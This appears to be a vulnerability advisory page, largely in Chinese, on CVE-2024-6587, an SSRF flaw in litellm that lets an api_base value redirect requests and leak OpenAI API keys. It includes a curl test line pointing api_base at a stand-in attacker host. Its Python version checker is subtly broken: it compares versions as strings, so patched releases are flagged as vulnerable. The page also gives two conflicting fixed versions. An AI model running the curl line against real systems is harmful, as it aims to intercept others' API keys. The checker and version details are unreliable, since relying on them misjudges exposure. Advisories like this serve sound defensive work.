CVE-2024-6587 描述了 berriai/litellm 中存在的服务器端请求伪造 (SSRF) 漏洞。此漏洞允许攻击者通过 api_base 参数控制请求的目标,从而可能导致敏感信息泄露。受影响的版本包括 litellm 版本 ≤1.9.dev0。建议升级至 1.44.8 版本以解决此问题。
该 SSRF 漏洞允许攻击者通过 apibase 参数指定请求的目标域名。当用户通过 POST /chat/completions 接口发送请求时,应用程序会将请求发送到攻击者指定的域名。更严重的是,此请求会包含 OpenAI API 密钥。攻击者可以利用此漏洞将 apibase 设置为自己的域名,从而拦截 OpenAI API 密钥。一旦获得 API 密钥,攻击者就可以冒充合法用户,访问 OpenAI 服务,执行未经授权的操作,例如生成文本、调用模型等,造成严重的经济损失和声誉损害。此漏洞的潜在影响包括数据泄露、服务中断以及未经授权的 API 使用。
目前尚未公开确认该漏洞被积极利用,但由于 SSRF 漏洞的潜在危害性,建议尽快采取缓解措施。该漏洞已于 2024 年 9 月 13 日公开披露。建议密切关注安全社区的动态,以获取有关此漏洞的最新信息和利用情况。
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
漏洞利用状态
EPSS
88.37% (99% 百分位)
CISA SSVC
CVSS 向量
解决 CVE-2024-6587 的主要方法是升级到 litellm 1.44.8 或更高版本。如果无法立即升级,可以考虑以下临时缓解措施:首先,严格限制 apibase 参数的输入来源,只允许来自可信来源的输入。其次,实施输入验证和过滤,确保 apibase 参数的值符合预期的格式和域名。此外,可以考虑使用 Web 应用防火墙 (WAF) 或代理服务器来检测和阻止恶意的 SSRF 请求。最后,定期审查应用程序的配置和代码,以识别和修复潜在的安全漏洞。
升级 litellm 库到 1.44.9 或更高版本。这修复了允许恶意用户拦截 OpenAI API 密钥的 SSRF 漏洞。运行 `pip install --upgrade litellm` 以升级到最新版本。
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2024-6587 是 berriai/litellm 中存在的服务器端请求伪造 (SSRF) 漏洞,允许攻击者通过 api_base 参数控制请求的目标,可能导致 OpenAI API 密钥泄露。
如果您正在使用 litellm 版本 ≤1.9.dev0,则可能受到影响。请尽快升级到 1.44.8 或更高版本。
升级到 litellm 1.44.8 或更高版本是修复此漏洞的最佳方法。如果无法升级,请实施输入验证和过滤,并考虑使用 WAF 或代理服务器。
目前尚未公开确认该漏洞被积极利用,但建议尽快采取缓解措施以降低风险。
请查阅 berriai/litellm 的官方 GitHub 仓库或相关安全公告,以获取有关此漏洞的最新信息。
上传你的 requirements.txt 文件,立即知道是否受影响。